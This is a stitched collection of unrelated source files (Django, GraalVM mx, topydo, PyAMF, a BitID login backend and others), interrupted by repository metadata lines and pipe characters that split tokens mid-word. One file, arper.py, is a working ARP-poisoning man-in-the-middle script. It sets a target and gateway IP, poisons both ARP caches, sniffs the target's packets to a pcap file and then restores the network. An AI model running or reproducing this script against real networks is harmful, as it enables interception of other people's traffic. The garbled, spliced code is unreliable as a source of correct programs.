otherwise get buffered by Python's output buffering (such as within a
processor intensive `` | for`` loop). Sin | ce such use cases typically also
require a lack of line endings (such as printing a series of dots to
signify progress) it also omits the traditional newline by default.
.. note::
Since `~fabric.utils.fastprint` calls `~fabric.utils.puts`, it is
likewise subject to the ``user`` :doc:`output level
</usage/output_controls>`.
.. versionadded:: 0.9.2
.. seealso:: `~fabric.utils.puts`
"""
return puts(text=text, show_prefix=show_prefix, end=end, flush=flush)
def handle_prompt_abort():
import fabric.state
if fabric.state.env.abort_on_prompts:
abort("Needed to prompt, but abort-on-prompts was set to True!")
|
mayapurmedia/tovp | tovp/contributions/migrations/0023_auto_20150414_1305.py | Python | mit | 792 | 0.002525 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models | , migrations
class Migration(migrations.Migration):
dependencies = [
('contributions', '0022_auto_20150413_1726'),
]
o | perations = [
migrations.AddField(
model_name='bulkpayment',
name='overwrite_pan_card',
field=models.CharField(null=True, verbose_name='Overwrite PAN card number', max_length=50, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='contribution',
name='overwrite_pan_card',
field=models.CharField(null=True, verbose_name='Overwrite PAN card number', max_length=50, blank=True),
preserve_default=True,
),
]
|
smarr/Truffle | vm/mx.vm/mx_vm.py | Python | gpl-2.0 | 19,478 | 0.002362 | #
# ----------------------------------------------------------------------------------------------------
#
# Copyright (c) 2018, 2021, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation. Oracle designates this
# particular file as subject to the "Classpath" exception as provided
# by Oracle in the LICENSE file that accompanied this code.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# ----------------------------------------------------------------------------------------------------
from __future__ import print_function
import mx
import mx_gate
import mx_jardistribution
import mx_sdk_vm, mx_sdk_vm_impl
import mx_vm_benchmark
import mx_vm_gate
import os
from os.path import basename, isdir, join, relpath
_suite = mx.suite('vm')
""":type: mx.SourceSuite | mx.Suite"""
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmJdkComponent(
suite=_suite,
name='Component installer',
short_name='gu',
dir_name='installer',
| license_files=[],
third_party_license_files=[],
dependencies=['sdk'],
jar_distributions=[
'vm:INSTALLER',
'truffle:TruffleJSON'
],
support_distributions=['vm:IN | STALLER_GRAALVM_SUPPORT'],
launcher_configs=[
mx_sdk_vm.LauncherConfig(
destination="bin/<exe:gu>",
jar_distributions=[
'vm:INSTALLER',
'truffle:TruffleJSON'
],
dir_jars=True,
main_class="org.graalvm.component.installer.ComponentInstaller",
build_args=[],
# Please see META-INF/native-image in the project for custom build options for native-image
is_sdk_launcher=True,
custom_launcher_script="mx.vm/gu.cmd" if mx.is_windows() else None,
),
],
stability="supported",
))
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmComponent(
suite=_suite,
name='GraalVM license files',
short_name='gvm',
dir_name='.',
license_files=['LICENSE.txt'],
third_party_license_files=['THIRD_PARTY_LICENSE.txt'],
dependencies=[],
support_distributions=['vm:VM_GRAALVM_SUPPORT'],
stability="supported",
))
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmJreComponent(
suite=_suite,
name='Polybench Launcher',
short_name='pbm',
license_files=[],
third_party_license_files=[],
dir_name='polybench',
launcher_configs=[mx_sdk_vm.LauncherConfig(
destination='bin/<exe:polybench>',
jar_distributions=['vm:POLYBENCH'],
main_class='org.graalvm.polybench.PolyBenchLauncher',
build_args=[
'-H:-ParseRuntimeOptions',
'-H:Features=org.graalvm.launcher.PolyglotLauncherFeature',
'--tool:all',
],
is_main_launcher=True,
default_symlinks=True,
is_sdk_launcher=True,
is_polyglot=True,
)],
))
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmTool(
suite=_suite,
name='Polybench Instruments',
short_name='pbi',
dir_name='pbi',
license_files=[],
third_party_license_files=[],
dependencies=['Truffle', 'Polybench Launcher'],
truffle_jars=['vm:POLYBENCH_INSTRUMENTS'],
support_distributions=['vm:POLYBENCH_INSTRUMENTS_SUPPORT'],
))
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmLanguage(
suite=_suite,
name='Polyglot Microbenchmark Harness',
short_name='pmh',
dir_name='pmh',
license_files=[],
third_party_license_files=[],
dependencies=['Truffle', 'Polybench Launcher'],
truffle_jars=['vm:PMH'],
support_distributions=['vm:PMH_SUPPORT'],
installable=False,
))
polybench_benchmark_methods = ["_run"]
# pylint: disable=line-too-long
ce_components = ['bpolyglot', 'cmp', 'cov', 'dap', 'gu', 'gvm', 'icu4j', 'ins', 'insight', 'insightheap', 'js', 'lg', 'libpoly', 'llrc', 'llrl', 'llrn', 'lsp', 'nfi-libffi', 'nfi', 'poly', 'polynative', 'pro', 'rgx', 'sdk', 'spolyglot', 'svm', 'svmnfi', 'svml', 'tfl', 'tflm', 'vvm']
ce_win_complete_components = ['bnative-image-configure', 'bpolyglot', 'cmp', 'cov', 'dap', 'ejvm', 'gu', 'gvm', 'gwa', 'icu4j', 'ins', 'insight', 'insightheap', 'java', 'js', 'lg', 'libpoly', 'lsp', 'nfi-libffi', 'nfi', 'ni', 'nic', 'nil', 'njs', 'poly', 'polynative', 'pro', 'rgx', 'sdk', 'spolyglot', 'svm', 'svmnfi', 'tfl', 'tflm', 'vvm']
ce_aarch64_complete_components = ce_win_complete_components + ['llp', 'llrc', 'llrl', 'llrn', 'rby', 'rbyl', 'svml']
ce_darwin_complete_components = ce_aarch64_complete_components + ['pyn', 'R', 'bRMain', 'pynl']
ce_complete_components = ce_darwin_complete_components + ['ellvm']
ce_ruby_components = ['cmp', 'cov', 'dap', 'gvm', 'ins', 'insight', 'insightheap', 'lg', 'llp', 'llrc', 'llrn', 'lsp', 'nfi-libffi', 'nfi', 'pro', 'rby', 'rbyl', 'rgx', 'sdk', 'svm', 'svmnfi', 'tfl', 'tflm', 'vvm']
ce_python_components = ['bgraalvm-native-binutil', 'bgraalvm-native-clang', 'bgraalvm-native-clang++', 'bgraalvm-native-ld', 'bgu', 'sjsvm', 'blli', 'bnative-image', 'bnative-image-configure', 'bpolybench', 'bpolyglot', 'cmp', 'cov', 'dap', 'dis', 'gu', 'gvm', 'icu4j', 'ins', 'insight', 'insightheap', 'js', 'lg', 'libpoly', 'llp', 'llrc', 'llrl', 'llrn', 'lsp', 'nfi-libffi', 'nfi', 'ni', 'nic', 'nil', 'nju', 'njucp', 'pbm', 'pmh', 'poly', 'polynative', 'pro', 'pyn', 'pynl', 'rgx', 'sdk', 'snative-image-agent', 'snative-image-diagnostics-agent', 'spolyglot', 'svm', 'svml', 'svmnfi', 'tfl', 'tflm', 'vvm']
ce_fastr_components = ['R', 'bRMain', 'bgraalvm-native-binutil', 'bgraalvm-native-clang', 'bgraalvm-native-clang++', 'bgraalvm-native-ld', 'bgu', 'sjsvm', 'blli', 'bpolyglot', 'cmp', 'cov', 'dap', 'gu', 'gvm', 'icu4j', 'ins', 'insight', 'insightheap', 'js', 'lg', 'libpoly', 'llp', 'llrc', 'llrl', 'llrn', 'lsp', 'nfi-libffi', 'nfi', 'poly', 'polynative', 'pro', 'rgx', 'sdk', 'spolyglot', 'svm', 'svml', 'svmnfi', 'tfl', 'tflm', 'vvm']
ce_no_native_components = ['bgu', 'sjsvm', 'blli', 'bgraalvm-native-clang', 'bgraalvm-native-clang++', 'bgraalvm-native-ld', 'bgraalvm-native-binutil', 'bnative-image', 'bnative-image-configure', 'bpolyglot', 'cmp', 'cov', 'dap', 'gu', 'gvm', 'icu4j', 'ins', 'insight', 'insightheap', 'js', 'lsp', 'nfi-libffi', 'nfi', 'ni', 'nic', 'nil', 'polynative', 'pro', 'rgx', 'sdk', 'llrc', 'llrn', 'llrl', 'snative-image-agent', 'snative-image-diagnostics-agent', 'spolyglot', 'svm', 'svmnfi', 'svml', 'tfl', 'tflm', 'libpoly', 'poly', 'vvm']
mx_sdk_vm.register_vm_config('ce', ['insight', 'insightheap', 'cmp', 'cov', 'dap', 'gu', 'gvm', 'icu4j', 'ins', 'js', 'lg', 'libpoly', 'lsp', 'nfi-libffi', 'nfi', 'poly', 'bpolyglot', 'polynative', 'pro', 'rgx', 'sdk', 'spolyglot', 'svm', 'svmnfi', 'tfl', 'tflm', 'vvm'], _suite, env_file='ce-win')
mx_sdk_vm.register_vm_config('ce', ce_components, _suite, env_file='ce-aarch64')
mx_sdk_vm.register_vm_config('ce', ce_components, _suite, env_file='ce-darwin')
mx_sdk_vm.register_vm_config('ce', ce_components, _suite)
mx_sdk_vm.register_vm_config('ce', ce_components + ['njs'], _suite, dist_name='ce', env_file='ce-nodejs')
mx_sdk_vm.register_vm_config('ce', ce_ruby_components, _suite, dist_name='ce-ruby', env_file='ce-ruby')
mx_sdk_vm.register_vm_config('ce', ce_win_complete_components, _suite, dist_name='ce-win-complete')
mx_sdk_vm.register_vm_config('ce', ce_aarch64_comp |
vdrey/Toolbox | Python/BHP/BHP-Code/BHP-Code/Chapter4/arper.py | Python | mit | 2,682 | 0.020507 | from scapy.all import *
import os
import sys
import threading
import time  # needed for time.sleep() below
interface = "en1"
target_ip = "172.16.1.71"
gateway_ip = "172.16.1.254"
packet_count = 1000
poisoning = True
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print "[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
def get_mac(ip_address):
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
def poi | son_target(gateway_ip,gateway_mac,target_ip,target_mac):
global poisoning
poison_target = ARP( | )
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while poisoning:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print "[*] ARP poison attack finished."
return
# set our interface
conf.iface = interface
# turn off output
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
except KeyboardInterrupt:
pass
finally:
# write out the captured packets
print "[*] Writing packets to arper.pcap"
wrpcap('arper.pcap',packets)
poisoning = False
# wait for poisoning thread to exit
time.sleep(2)
# restore the network
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
|
MinchinWeb/topydo | topydo/commands/DepriCommand.py | Python | gpl-3.0 | 1,906 | 0.001049 | # Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 - 2015 Bram Schoenmakers <me@bramschoenmakers.nl>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from topydo.lib.MultiCommand import MultiCommand
from topydo.lib.PrettyPrinterFilter import PrettyPrinterNumbers
class DepriCommand(MultiCommand):
def __init__(self, p_args, p_todolist,
p_out=lambda a: None,
p_err=lambda a: None,
p_prompt=lambda a: None):
super(DepriCommand, self).__init__(
p_args, p_todolist, p_out, p_err, p_prompt)
def _execute_multi_specific(self):
self.printer.add_filter(PrettyPrinterNumbers(self.todol | ist))
for todo in self.todos:
            if todo.priority() is not None:
self.todolist.set_priority(todo, None)
self.out("Priority removed.")
self.out(self.printer.print_todo(todo))
def usage(self):
return """\
Synopsis: depri <NUMBER1> [<NUMBER2> ...]
depri [-x] -e <EXPRESSION>
"""
def help(self):
return """Removes the priority of the given todo item | (s).
It is also possible to deprioritize items with an expression using
the -e flag. Use -x to also process todo items that are normally invisible
(with the 'ls' subcommand).
"""
|
manuelzs/django-bitid | djbitid/backends.py | Python | mit | 2,846 | 0.004216 | from django.core.exceptions import ObjectDoesNotExist
from django.conf import settings
from django.contrib.auth.models import User
from pybitid import bitid
from models import Nonce
class BitIdBackend(object):
USE_TESTNET_DEFAULT = False
def authenticate(self, bitid_uri=None, callback_uri=None,
signature=None, address=None, errors=[]):
if bitid_uri is None or callback_uri is None or signature is None or address is None:
errors.append('Invalid parameters')
return None
#
        # Let's start with a bunch of validations
#
use_testnet = getattr(settings, 'BITID_USE_TESTNET', self.USE_TESTNET_DEFAULT)
# Checks the address
if not bitid.address_valid(address, use_testnet):
errors.append("Address is invalid or not legal")
return None
# Checks the bitid uri
if not bitid.uri_valid(bitid_uri, callback_uri):
errors.append("BitID URI is invalid or not legal")
return None
# Checks the signature
if not bitid.signature_valid(address, signature,
bitid_uri, callback_uri,
use_testnet):
errors.append("Signature is incorrect")
return None
# Checks the nonce
nid = bitid.extract_nonce(bitid_uri)
# Tries to retrieve the nonce from db
try:
nonce = Nonce.objects.get(nid=nid)
except ObjectDoesNotExist:
errors.append("NONCE is illegal")
return None
if nonce.has_expired():
nonce.delete()
errors.append("NONCE has expired")
return None
#
# So good so far, everything seems ok
        # It's time to check if we have a sign up or a sign in
#
# Checks if a user with the given address has already been registered in db (sign in)
try:
user = User.objects.get(username=address)
except ObjectDoesNotExist:
# Here, we have an important check to do in order to avoid flooding of the users db
# Let's check for a pr | oof of goodwill (@see pybitid_demo.services.fake_tx_db_service)
if not self.goodwill_check(address):
errors.append("Address is invalid or not legal")
return None
# Creates a new user and stores it in db
user = User.objects.create_user(username=address)
user.save()
# To finalize t | he authentication, let's set the user id in the nonce and update it in db
nonce.user = user
nonce.save()
return user
def goodwill_check(self, address):
"""
TODO Check to prevent flooding
"""
return True
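# Illustrative wiring only (the dotted path is assumed from this module's
# location inside the djbitid app); Django would select this backend via the
# standard setting:
#   AUTHENTICATION_BACKENDS = ('djbitid.backends.BitIdBackend',)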
|
koniiiik/django | tests/requests/test_data_upload_settings.py | Python | bsd-3-clause | 6,773 | 0.001329 | from io import BytesIO
from django.core.exceptions import RequestDataTooBig, TooManyFieldsSent
from django.core.handlers.wsgi import WSGIRequest
from django.test import SimpleTestCase
from django.test.client import FakePayload
TOO_MANY_FIELDS_MSG = 'The number of GET/POST parameters exceeded settings.DATA_UPLOAD_MAX_NUMBER_FIELDS.'
TOO_MUCH_DATA_MSG = 'Request body exceeded settings.DATA_UPLOAD_MAX_MEMORY_SIZE.'
class DataUploadMaxMemorySizeFormPostTests(SimpleTestCase):
def setUp(self):
payload = FakePayload('a=1&a=2;a=3\r\n')
self.request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
def test_size_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=12):
with self.assertRaisesMessage(RequestDataTooBig, TOO_MUCH_DATA_MSG):
self.request._load_post_and_files()
def test_size_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=13):
self.request._load_post_and_files()
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=None):
self.request._load_post_and_files()
class DataUploadMaxMemorySizeMultipartPostTests(SimpleTestCase):
def setUp(self):
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name"',
'',
'value',
'--boundary--'
''
]))
self.request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
def test_size_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=10):
with self.assertRaisesMessage(RequestDataTooBig, TOO_MUCH_DATA_MSG):
self.request._load_post_and_files()
def test_size_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=11):
self.request._load_post_and_files()
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=None):
self.request._load_post_and_files()
def test_file_passes(self):
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="file1"; filename="test.file"',
'',
'value',
'--boundary--'
''
]))
request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=1):
request._load_post_and_files()
self.assertIn('file1', request.FILES, "Upload file not present")
class DataUploadMaxMemorySizeGetTests(SimpleTestCase):
def setUp(self):
self.request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'wsgi.input': BytesIO(b''),
'CONTENT_LENGTH': 3,
})
def test_data_upload_max_memory_size_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=2):
with self.assertRaisesMessage(RequestDataTooBig, TOO_MUCH_DATA_MSG):
self.request.body
def test_size_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=3):
self.request.body
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=None):
self.request.body
def test_empty | _content_length(self):
self.request.environ['CONTENT_LENGTH'] = ''
self.request.body
class DataUploadMaxNumberOfFieldsGet(SimpleTestCase):
def test_get_max_fields_exceeded(self):
with se | lf.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=1):
with self.assertRaisesMessage(TooManyFieldsSent, TOO_MANY_FIELDS_MSG):
request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'wsgi.input': BytesIO(b''),
'QUERY_STRING': 'a=1&a=2;a=3',
})
request.GET['a']
def test_get_max_fields_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=3):
request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'wsgi.input': BytesIO(b''),
'QUERY_STRING': 'a=1&a=2;a=3',
})
request.GET['a']
class DataUploadMaxNumberOfFieldsMultipartPost(SimpleTestCase):
def setUp(self):
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name1"',
'',
'value1',
'--boundary',
'Content-Disposition: form-data; name="name2"',
'',
'value2',
'--boundary--'
''
]))
self.request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
def test_number_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=1):
with self.assertRaisesMessage(TooManyFieldsSent, TOO_MANY_FIELDS_MSG):
self.request._load_post_and_files()
def test_number_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=2):
self.request._load_post_and_files()
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=None):
self.request._load_post_and_files()
class DataUploadMaxNumberOfFieldsFormPost(SimpleTestCase):
def setUp(self):
payload = FakePayload("\r\n".join(['a=1&a=2;a=3', '']))
self.request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
def test_number_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=2):
with self.assertRaisesMessage(TooManyFieldsSent, TOO_MANY_FIELDS_MSG):
self.request._load_post_and_files()
def test_number_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=3):
self.request._load_post_and_files()
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=None):
self.request._load_post_and_files()
|
anhstudios/swganh | data/scripts/templates/object/draft_schematic/instrument/shared_instrument_bandfill.py | Python | mit | 459 | 0.04793 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from | swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/instrument/shared_instrument_bandfill.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### | END MODIFICATIONS ####
return result |
lvella/tagmaker | tagmaker.py | Python | gpl-3.0 | 3,169 | 0.002841 | #!/usr/bin/python3
# Copyright 2013 Universidade Federal de Uberlândia
# Author: Lucas Clemente Vella <lucas.vella@i9nagi.ufu.br>
# Utility to batch create conference tags from CSV data and SVG template.
import os
import io
import os.path
import sys
import csv
import re
import subprocess
import itertools
import jinja2
parser = re.compile(r'Batch (?P<number>\d+):\n(?P<csv>(.*?,.*?\n)+)')
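# A sketch of the generated_status.txt layout this regex expects, as implied
# by parse_status() below and the writer code in main(); the CSV columns here
# are placeholders:
#   Batch 1:
#   Alice Example,alice@example.org
#   Bob Example,bob@example.org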
def parse_status(status_text):
number = 0
already_done = set()
for match in parser.finditer(status_text):
number = int(match.group('number'))
csv_buf = io.StringIO(match.group('csv'))
already_done.update(map(tuple, csv.reader(csv_buf)))
return number, already_done
def main():
try:
working_dir = sys.argv[1]
os.chdir(working_dir)
except IndexError:
pass # use current directory as working dir
except FileNotFoundError as e:
print(e, '\nUsage:\n {} [working_directory]\nIf working directory is not provided, current directory will be used instead.'.format(sys.argv[0]))
sys.exit(1)
template = jinja2.Template(open('template.svg', 'r').read())
reader = csv.reader(open('data.csv', 'r'))
variables = next(reader)
data = set(map(tuple, reader))
status = open('generated_status.txt', 'a+')
status.seek(0)
last_batch, already_done = parse_status(status.read())
batch_num = last_batch + 1
data -= already_done
if not data:
print('Nothing new to process, everything is in one of the batches.\nSee "generated_status.txt" file.')
sys.exit(0)
batch_path = 'batch{:03d}'.format(batch_num)
os.mkdir(batch_path)
workers = []
outnames = []
def write_out(base_name, text):
svg_name = base_name + '.svg'
pdf_name = base_name + '.pdf'
with open(svg_name, 'w') as output:
            output.write(text)
workers.append(subprocess.Popen(['inkscape', '-z', '-f={}'.format(svg_name), '-A={}.pdf'.format(base_name)]))
outnames.append(pdf_name)
for row in data:
kwargs = dict(zip(variables, row))
gen = template.render(**kwargs)
base_name = os.path.join(batch_path, ','.join(row).replace('/', '_'))
write_out(base_name, gen)
blank_tags = (8 - (len(data) % 8)) % 8
if blank_tags:
gen = template.render(**dict(zip(variables, itertools.repeat(''))))
write_out('blank', gen)
outnames += [outnames[-1]] * (blank_tags - 1)
listing_text = '\n'.join(map(','.join, data)) + '\n'
print("Processed:")
print(listing_text)
with open(os.path.join(batch_path, 'listing.txt'), 'w') as listing:
listing.write(listing_text)
status.seek(0, os.SEEK_END)
status.write('Batch {}:\n'.format(batch_num))
status.write(listing_text)
for w in workers:
w.wait()
group_cmd = | "pdfnup --suffix nup --nup '2x4' --paper a4paper --no-landscape --noautoscale true --frame true --outfile {} -- ".format(os.path.join(batch_path, 'to_print.pdf')) + ' '.join(map('"{}"'.format, outnames))
print( | group_cmd)
os.system(group_cmd)
print('Done.')
if __name__ == "__main__":
main()
|
jamesward-demo/air-quick-fix | AIRQuickFixServer/pyamf/flex/messaging.py | Python | apache-2.0 | 9,203 | 0.001087 | # Copyright (c) 2007-2008 The PyAMF Project.
# See LICENSE for details.
"""
Flex Messaging implementation.
This module contains the message classes used with Flex Data Services.
@see: U{RemoteObject on OSFlash (external)
<http://osflash.org/documentation/amf3#remoteobject>}
@author: U{Arnar Birgisson<mailto:arnarbi@gmail.com>}
@author: U{Thijs Triemstra<mailto:info@collab.nl>}
@author: U{Nick Joyce<mailto:nick@boxdesign.co.uk>}
@since: 0.1.0
"""
import pyamf
__all__ = [
'RemotingMessage',
'CommandMessage',
'AcknowledgeMessage',
'ErrorMessage'
]
class AbstractMessage(object):
"""
Abstract base class for all Flex messages.
Messages have two customizable sections; headers and data. The headers
property provides access to specialized meta information for a specific
message instance. The data property contains the instance specific data
that needs to be delivered and processed by the decoder.
@see: U{AbstractMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/AbstractMessage.html>}
@ivar body: Specific data that needs to be delivered to the remote
destination.
@type body: C{mixed}
@ivar clientId: Indicates which client sent the message.
@type clientId: C{str}
@ivar destination: Message destination.
@type destination: C{str}
@ivar headers: Message headers. Core header names start with DS.
@type headers: C{dict}
@ivar messageId: Unique Message ID.
@type messageId: C{str}
@ivar timeToLive: How long the message should be considered valid and
deliverable.
@type timeToLive: C{int}
@ivar timestamp: Timestamp when the message was generated.
@type timestamp: C{int}
"""
#: Each message pushed from the server will contain this header identifying
#: the client that will receive the message.
DESTINATION_CLIENT_ID_HEADER = "DSDstClientId"
#: Messages are tagged with the endpoint id for the channel they are sent
#: over.
ENDPOINT_HEADER = "DSEndpoint"
#: Messages that need to set remote credentials for a destination carry the
| #: C{Base64} encoded credentials in this header.
REMOTE_CREDENTIALS_HEADER = "DSRemoteCredentials"
#: The request timeout value is set on outbound messages by services or
#: channels and the value controls how long the responder will wait for an
#: acknowledgement, result or fault response for the message | before timing
#: out the request.
REQUEST_TIMEOUT_HEADER = "DSRequestTimeout"
def __init__(self, *args, **kwargs):
self.body = kwargs.get('body', None)
self.clientId = kwargs.get('clientId', None)
self.destination = kwargs.get('destination', None)
self.headers = kwargs.get('headers', {})
self.messageId = kwargs.get('messageId', None)
self.timeToLive = kwargs.get('timeToLive', 0)
self.timestamp = kwargs.get('timestamp', 0)
def __repr__(self):
m = '<%s ' % self.__class__.__name__
for k, v in self.__dict__.iteritems():
m += ' %s=%s' % (k, v)
return m + " />"
class AsyncMessage(AbstractMessage):
"""
I am the base class for all asynchronous Flex messages.
@see: U{AsyncMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/AsyncMessage.html>}
@ivar correlationId: Correlation id of the message.
@type correlationId: C{str}
"""
#: Messages that were sent with a defined subtopic property indicate their
#: target subtopic in this header.
SUBTOPIC_HEADER = "DSSubtopic"
def __init__(self, *args, **kwargs):
AbstractMessage.__init__(self, *args, **kwargs)
self.correlationId = kwargs.get('correlationId', None)
class AcknowledgeMessage(AsyncMessage):
"""
I acknowledge the receipt of a message that was sent previously.
Every message sent within the messaging system must receive an
acknowledgement.
@see: U{AcknowledgeMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/AcknowledgeMessage.html>}
"""
#: Used to indicate that the acknowledgement is for a message that
#: generated an error.
ERROR_HINT_HEADER = "DSErrorHint"
class CommandMessage(AsyncMessage):
"""
Provides a mechanism for sending commands related to publish/subscribe
messaging, ping, and cluster operations.
@see: U{CommandMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/CommandMessage.html>}
@ivar operation: The command
@type operation: C{int}
@ivar messageRefType: hmm, not sure about this one.
@type messageRefType: C{str}
"""
#: The server message type for authentication commands.
AUTHENTICATION_MESSAGE_REF_TYPE = "flex.messaging.messages.AuthenticationMessage"
#: This is used to test connectivity over the current channel to the remote
#: endpoint.
PING_OPERATION = 5
#: This is used by a remote destination to sync missed or cached messages
#: back to a client as a result of a client issued poll command.
SYNC_OPERATION = 4
#: This is used to request a list of failover endpoint URIs for the remote
#: destination based on cluster membership.
CLUSTER_REQUEST_OPERATION = 7
#: This is used to send credentials to the endpoint so that the user can be
#: logged in over the current channel. The credentials need to be C{Base64}
#: encoded and stored in the body of the message.
LOGIN_OPERATION = 8
#: This is used to log the user out of the current channel, and will
#: invalidate the server session if the channel is HTTP based.
LOGOUT_OPERATION = 9
#: This is used to poll a remote destination for pending, undelivered
#: messages.
POLL_OPERATION = 2
#: Subscribe commands issued by a consumer pass the consumer's C{selector}
#: expression in this header.
SELECTOR_HEADER = "DSSelector"
#: This is used to indicate that the client's session with a remote
#: destination has timed out.
SESSION_INVALIDATE_OPERATION = 10
#: This is used to subscribe to a remote destination.
SUBSCRIBE_OPERATION = 0
#: This is the default operation for new L{CommandMessage} instances.
UNKNOWN_OPERATION = 1000
#: This is used to unsubscribe from a remote destination.
UNSUBSCRIBE_OPERATION = 1
def __init__(self, *args, **kwargs):
AsyncMessage.__init__(self, *args, **kwargs)
self.operation = kwargs.get('operation', None)
#: Remote destination belonging to a specific service, based upon
